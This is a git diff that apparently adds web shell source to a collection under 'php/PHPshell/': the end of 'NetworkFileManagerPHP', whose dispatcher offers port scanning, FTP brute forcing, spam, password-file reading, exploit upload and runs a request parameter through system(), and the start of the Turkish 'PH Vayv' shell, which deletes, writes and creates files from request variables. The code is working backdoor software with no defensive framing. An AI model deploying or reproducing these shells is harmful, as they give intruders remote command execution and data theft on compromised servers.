Base:$dbbase \n"; + + $data.="##-------------------------\n\n"; + + write_file($data); + + unset($data); + +} + + + +function file_pos() { + + global $g_fp,$file_type; + + if ($file_type=="1") { return gztell ($g_fp); } + + else { return ftell ($g_fp); } + +} + + + +function close_file() { + + global $g_fp,$file_type; + + if ($file_type=="1") { gzclose ($g_fp); } + + else { fclose ($g_fp); } + +} + + + +function split_sql_file($sql) { + + $morc=explode(";",$sql); + + $sql=""; + + $output=array(); + + $matches=array(); + + $morc_cpt=count($morc); + + for ($i=0;$i < $morc_cpt;$i++) { + + if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) { + + $total_quotes=preg_match_all("/'/",$morc[$i],$matches); + + $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches); + + $unescaped_quotes=$total_quotes-$escaped_quotes; + + if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; } + + else { + + $temp=$morc[$i].";"; + + $morc[$i]=""; + + $complete_stmt=false; + + for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) { + + $total_quotes = preg_match_all("/'/",$morc[$j],$matches); + + $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches); + + $unescaped_quotes=$total_quotes-$escaped_quotes; + + if (($unescaped_quotes % 2)==1) { + + $output[]=$temp.$morc[$j]; + + $morc[$j]=""; + + $temp=""; + + $complete_stmt=true; + + $i=$j; + + } else { + + $temp.=$morc[$j].";"; + + $morc[$j]=""; + + } + + } + + } + + } + + } + + return $output; + +} + + + +function split_csv_file($csv) { return explode("\n",$csv); } + +// SQL functions END + + + +// main SQL() + +function sql() { + + global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm; + + $secu_config="xtdump_conf.inc.php"; + + $dbhost=$_POST['dbhost']; + + $dbuser=$_POST['dbuser']; + + $dbpass=$_POST['dbpass']; + + $dbbase=$_POST['dbbase']; + + $tbls =$_POST['tbls']; + + $sqlaction =$_POST['sqlaction']; + + $secu =$_POST['secu']; + + $f_cut 
=$_POST['f_cut']; + + $fz_max =$_POST['fz_max']; + + $opt =$_POST['opt']; + + $savmode =$_POST['savmode']; + + $file_type =$_POST['file_type']; + + $ecraz =$_POST['ecraz']; + + $f_tbl =$_POST['f_tbl']; + + $drp_tbl=$_POST['drp_tbl']; + + + + $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>"; + + $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright(); + + + + // SQL actions STARTS + + + + if ($sqlaction=='save') { + + if ($secu==1) { + + $fp=fopen($secu_config,"w"); + + fputs($fp,"<?php\n"); + + fputs($fp,"\$dbhost='$dbhost';\n"); + + fputs($fp,"\$dbbase='$dbbase';\n"); + + fputs($fp,"\$dbuser='$dbuser';\n"); + + fputs($fp,"\$dbpass='$dbpass';\n"); + + fputs($fp,"?>"); + + fclose($fp); + + } + + if (!is_array($tbls)) { + + echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"> + +<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer"; + + exit; + + } + + if($f_cut==1) { + + if (!is_numeric($fz_max)) { + + echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer"; + + exit; + + } + + if ($fz_max < 200000) { + + echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup + + rieure ? 
200 000 Octets.</b></font></center>\n$footer"; + + exit; + + } + + } + + + + $tbl=array(); + + $tbl[]=reset($tbls); + + if (count($tbls) > 1) { + + $a=true; + + while ($a !=false) { + + $a=next($tbls); + + if ($a !=false) { $tbl[]=$a; } + + } + + } + + + + if ($opt==1) { $sv_s=true; $sv_d=true; } + + else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; } + + else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; } + + else { exit; } + + + + $fext=".".$savmode; + + $fich=$dbbase.$fc.$fext; + + $dte=""; + + if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz=""; + + if ($file_type=='1') { $gz.=".gz"; } + + $fcut=false; + + $ftbl=false; + + $f_nm=array(); + + if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;} + + if($f_tbl==1) { $ftbl=true; } + + else { + + if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); } + + else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); } + + } + + + + $nbf=1; + + mysql_connect($dbhost,$dbuser,$dbpass); + + mysql_select_db($dbbase); + + if ($fext==".sql") { + + if ($ftbl) { + + while (list($i)=each($tbl)) { + + $temp=sqldumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut) { + + open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz); + + $nbf=0; + + $p_sql=split_sql_file($temp); + + while(list($j,$val)=each($p_sql)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); } + + else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); } + + } + + close_file(); + + } + + else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; } + + $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; + + } + + } else { + + $tblsv=""; + + while (list($i)=each($tbl)) { + + $temp=sqldumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut && ((file_pos()+$sz_t) > $fz_max)) { + + $p_sql=split_sql_file($temp); + + while(list($j,$val)=each($p_sql)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); } + + 
else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz); + + write_file($val.";"); + + } + + } + + } else { write_file($temp); } + + $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; + + } + + } + + } + + else if ($fext==".csv") { + + if ($ftbl) { + + while (list($i)=each($tbl)) { + + $temp=csvdumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut) { + + open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz); + + $nbf=0; + + $p_csv=split_csv_file($temp); + + while(list($j,$val)=each($p_csv)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); } + + else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz); + + write_file($val."\n"); + + } + + } + + close_file(); + + } else { + + open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz); + + write_file($temp."\n\n"); + + close_file(); + + $nbf=1; + + } + + $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; + + } + + } else { + + while (list($i)=each($tbl)) { + + $temp=csvdumptable($tbl[$i]); + + $sz_t=strlen($temp); + + if ($fcut && ((file_pos()+$sz_t) > $fz_max)) { + + $p_csv=split_sql_file($temp); + + while(list($j,$val)=each($p_csv)) { + + if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); } + + else { + + close_file(); + + $nbf++; + + open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz); + + write_file($val."\n"); + + } + + } + + } else { write_file($temp); } + + $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; + + } + + } + + } + + + + mysql_close(); + + if (!$ftbl) { close_file(); } + + + + echo $header; + + echo "<br><center>All the data in these tables:<br> ".$tblsv." 
were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; + + reset($f_nm); + + while (list($i,$val)=each($f_nm)) { + + $coul='#99CCCC'; + + if ($i % 2) { $coul='#CFE3E3'; } + + echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>"; + + $fz_tmp=filesize($val); + + if ($fcut && ($fz_tmp > $fz_max)) { + + echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>"; + + } else { + + echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>"; + + } + + echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; + + } + + echo "</table><br>"; + + echo $footer;exit; + + } + + + + if ($sqlaction=='connect') { + + if(!@mysql_connect($dbhost,$dbuser,$dbpass)) { + + echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer"; + + exit; + + } + + + + if(!@mysql_select_db($dbbase)) { + + echo $header."<br><center><font color=red><<b>Unable to connect! 
Check your data input!</b></font></center>\n$footer"; + + exit; + + } + + + + if ($secu==1) { + + if (!file_exists($secu_config)) { + + $fp=fopen($secu_config,"w"); + + fputs($fp,"<?php\n"); + + fputs($fp,"\$dbhost='$dbhost';\n"); + + fputs($fp,"\$dbbase='$dbbase';\n"); + + fputs($fp,"\$dbuser='$dbuser';\n"); + + fputs($fp,"\$dbpass='$dbpass';\n"); + + fputs($fp,"?>"); + + fclose($fp); + + } + + include($secu_config); + + } else { + + if (file_exists($secu_config)) { unlink($secu_config); } + + } + + + + mysql_connect($dbhost,$dbuser,$dbpass); + + $tables=mysql_list_tables($dbbase); + + $nb_tbl=mysql_num_rows($tables); + + + + echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; + + + + $i=0; + + while ($i < mysql_num_rows ($tables)) { + + $coul='#99CCCC'; + + if ($i % 2) { 
$coul='#CFE3E3';} + + $tb_nom=mysql_tablename ($tables,$i); + + echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; + + $i++; + + } + + + + mysql_close(); + + echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'> + + Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked> + + Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked> + + Save structure and data<br> <input type='radio' name='opt' value='2'> + + Save structure only<br> <input type='radio' name='opt' value='3'> + + Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked> + + Rewrite file if exists<br> <input type='Checkbox' name='ecraz' value='1' checked> + + Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'> + + Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'> + + Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form> + + Octets<br> <input type='Checkbox' name='file_type' value='1'> + + Gzip.<br> + + </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer"; + + exit; + + } + + + +// SQL actions END + + + + if(file_exists($secu_config)) { + + include ($secu_config); + + $ck="checked"; + + } else { + + $dbhost="localhost"; + + $dbbase=""; + + $dbuser="root"; + + $dbpass=""; + + $ck=""; + + } + + + + echo $header." 
+ +<center><br><br> + +<table width=620 cellpadding=0 cellspacing=0 align=center> + + <col width=1> + + <col width=600> + + <col width=1> + + <tr> + + <td></td> + + <td align=left class=texte> + + <br> + + <form action='' method='post'> + + <input type='hidden' name='sqlaction' value='connect'> + + <table border=0 align=center> + + <col> + + <col align=left> + + <tr> + + <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td> + + </tr> + + <tr> + + <td class=texte>Server address:</td> + + <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td> + + </tr> + + <tr> + + <td class=texte>Base name:</td> + + <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td> + + </tr> + + <tr> + + <td class=texte>Login:</td> + + <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td> + + </tr> + + <tr> + + <td class=texte>Password</td> + + <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td> + + </tr> + + </table> + + <br> <center> <br><br> + + <input type='submit' value=' Connect ' class=form></center> </form> <br><br> + + </td> + + <td></td> + + </tr> + + <tr> + + <td height=1 colspan=3></td> + + </tr> + +</table> + +</center>"; + + + +} + +// SQL END + + + +/* main() */ + +set_time_limit(0); + + + +if ( $action !="download") print("$HTML"); + + + +if (!isset($cm)) { + + if (!isset($action)) { + + if (!isset($tm)) { $tm = getcwd(); } + + $curdir = getcwd(); + + if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>"); + + getdir(); + + chdir($curdir); + + $supsub = $gdir[$j-1]; + + if (!isset($tm) ) { $tm=getcwd();} + + readdirdata($tm); + + } else { + + switch ($action) { + + case "view": + + viewfile($tm,$fi); + + 
break; + + case "delete": + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>"; + + deletef($tm); + + break; + + case "download": + + if (isset($fatt) && strlen($fatt)>0) { + + $attach=$fatt; + + header("Content-type: text/plain"); + + } + + else { + + $attach=$fi; + + header("Content-type: hackru"); + + } + + header("Content-disposition: attachment; filename=\"$attach\";"); + + readfile($tm."/".$fi); + + break; + + case "download_mail": + + download_mail($tm,$fi); + + break; + + case "edit": + + editfile($tm,$fi); + + break; + + case "save": + + savefile($tm,$fi); + + break; + + case "uploadd": + + uploadtem(); + + break; + + case "up": + + up($tm); + + break; + + case "newdir": + + newdir($tm); + + break; + + case "createdir": + + cdir($tm); + + break; + + case "deldir": + + deldir(); + + break; + + case "feedback": + + mailsystem(); + + break; + + case "upload": + + upload(); + + break; + + case "help": + + help(); + + break; + + case "ftp": + + ftp(); + + break; + + case "portscan": + + portscan(); + + break; + + case "sql": + + sql(); + + break; + + case "tar": + + tar(); + + break; + + case "bash": + + bash(); + + break; + + case "passwd": + + passwd(); + + break; + + case "exploits": + + exploits($dir); + + break; + + case "upload_exploits": + + upload_exploits($dir); + + break; + + case "upload_exploitsp": + + upload_exploitsp($dir); + + break; + + case "arhiv": + + arhiv($tm,$pass); + + break; + + case "crypte": + + crypte(); + + break; + + case "decrypte": + + decrypte(); + + break; + + case "brut_ftp": + + brut_ftp(); + + break; + + case "copyfile": + + copyfile($tm,$fi); + + break; + + case "down": + + down($dir); + + break; + + case "downfiles": + + downfiles($dir); + + break; + + case "spam": + + spam(); + + 
break; + + } + + } + +} else { + + echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>"; + + echo system($cm); + + echo "</pre></td></tr></table>"; + +} + + + +if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd" && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") { + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>"; + + $perdir = @permissions(fileperms($tm)); + + if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem(); + + else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>"; + + if ($perdir[7] == "w" && isset($tm)) { + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center 
colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>"; + + } else { + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>"; + + } + +} + + + +if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd" && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") { + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>"; + + foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>"; + + echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>"; + +} + + + +if ( $action !="download") echo nfm_copyright(); + +?> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + +
diff --git a/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg
new file mode 100644
index 0000000..160b641
Binary files /dev/null and b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg differ
diff --git a/php/PHPshell/PH Vayv/PH Vayv.jpg b/php/PHPshell/PH Vayv/PH Vayv.jpg
new file mode 100644
index 0000000..e764ae4
Binary files /dev/null and b/php/PHPshell/PH Vayv/PH Vayv.jpg differ
diff --git a/php/PHPshell/PH Vayv/PH Vayv.php b/php/PHPshell/PH Vayv/PH Vayv.php
new file mode 100644
index 0000000..c01e2c7
--- /dev/null
+++ b/php/PHPshell/PH Vayv/PH Vayv.php
@@ -0,0 +1,597 @@ +<? if($sistembilgisi > "") {phpinfo();} else { ?> + + +<?$fistik=PHVayv;?> + + +<?if ($sildos>"") {unlink("$dizin/$sildos");} ?> + +<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?> + +<?if ($silklas > ""){rmdir($silklas);}?> + +<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?> + + + +<?if ($yenidosya == "1") { +$baglan=fopen("$dizin/$duzenx2",'w'); +fwrite($baglan,$duzenx); +fclose($baglan);} +?> + + + + +<?if ($duzkaydet > "") { + +$baglan=fopen($duzkaydet,'w'); +fwrite($baglan,$duzenx); +fclose($baglan);} +?> + + + + +<?if ($yenklas>"") {;?> +<body topmargin="0" leftmargin="0"> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59"> + <tr> + <td width="70" bgcolor="#000000" height="76"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/avlog.gif"></td> + <td width="501" bgcolor="#000000" height="76" valign="top"> + <font face="Verdana" style="font-size: 8pt" color="#B7B7B7"> + <span style="font-weight: 700"> + <br> + AventGrup©<br> + </span>Avrasya Veri ve NetWork Teknolojileri Geli‏tirme Grubu<br> + <span style="font-weight: 700"> + <br> + PHVayv 1.0</span></font></td> + <td width="431" bgcolor="#000000" height="76" valign="top"> + <p align="right"><span style="font-weight: 700"> + <font face="Verdana" color="#858585" style="font-size: 2pt"><br> + </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a href="http://www.aventgrup.net" style="text-decoration: none"> + <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br> + </font></span><font face="Verdana" style="font-size: 8pt" color="#858585"> + <a href="mailto:shopen@aventgrup.net" style="text-decoration: none"> + <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" 
style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td> + </tr> + </table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20"> + <tr> + <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana"> + <span style="font-size: 8pt">&nbsp;اal‎‏‎lan </span></font> + <font face="Verdana" style="font-size: 8pt">Dizin</font></td> + <td bgcolor="#D6D6D6" height="20"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4"> + <tr> + <td width="1"></td> + <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td> + <td width="65"> + &nbsp;</td> + </tr> + </table> + </td> + </tr> +</table> + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184"> + <tr> + <td width="100%" bgcolor="#000000" height="19">&nbsp;</td> + </tr> + <tr> + <td width="100%" bgcolor="#9F9F9F" align="center" height="144"> + <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" + <p align="center"><br> + <font + color="#FFFFFF" size="1" face="Arial"> +<input + type="text" size="37" maxlength="32" + name="duzenx2" value="Klasِr Ad‎" + class="search" + onblur="if (this.value == '') this.value = 'Kullan‎c‎'" + onfocus="if (this.value == 'Kullan‎c‎') this.value=''" + style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p> +<p align="center"> + <span class="gensmall"> + <input type="submit" size="16" + name="duzenx1" value="Kaydet" + style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 
1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center" + </span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br> +&nbsp;</font></b></p> +</form> +</td> + </tr> + <tr> + <td width="100%" bgcolor="#000000" align="center" height="19"> + &nbsp;</td> + </tr> + </table> + + + +<? } else { ?> + + + + +<?if ($yendos>"") {; +?> + +<body topmargin="0" leftmargin="0"> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59"> + <tr> + <td width="70" bgcolor="#000000" height="76"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/avlog.gif"></td> + <td width="501" bgcolor="#000000" height="76" valign="top"> + <font face="Verdana" style="font-size: 8pt" color="#B7B7B7"> + <span style="font-weight: 700"> + <br> + AventGrup©<br> + </span>Avrasya Veri ve NetWork Teknolojileri Geli‏tirme Grubu<br> + <span style="font-weight: 700"> + <br> + PHVayv 1.0</span></font></td> + <td width="431" bgcolor="#000000" height="76" valign="top"> + <p align="right"><span style="font-weight: 700"> + <font face="Verdana" color="#858585" style="font-size: 2pt"><br> + </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a href="http://www.aventgrup.net" style="text-decoration: none"> + <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br> + </font></span><font face="Verdana" style="font-size: 8pt" color="#858585"> + <a href="mailto:shopen@aventgrup.net" style="text-decoration: none"> + <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" 
color="#858585">&nbsp;</font></td> + </tr> + </table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20"> + <tr> + <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana"> + <span style="font-size: 8pt">&nbsp;اal‎‏‎lan </span></font> + <font face="Verdana" style="font-size: 8pt">Dizin</font></td> + <td bgcolor="#D6D6D6" height="20"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4"> + <tr> + <td width="1"></td> + <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td> + <td width="65"> + &nbsp;</td> + </tr> + </table> + </td> + </tr> +</table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495"> + <tr> + <td width="100%" bgcolor="#000000" height="19">&nbsp;</td> + </tr> + <tr> + <td width="100%" bgcolor="#9F9F9F" align="center" height="455"> + <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" + <p align="center"><br> + <font + color="#FFFFFF" size="1" face="Arial"> +<input + type="text" size="50" maxlength="32" + name="duzenx2" value="Dosya Ad‎" + class="search" + onblur="if (this.value == '') this.value = 'Kullan‎c‎'" + onfocus="if (this.value == 'Kullan‎c‎') this.value=''" + style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p> +<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> + <textarea name="duzenx" + style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px 
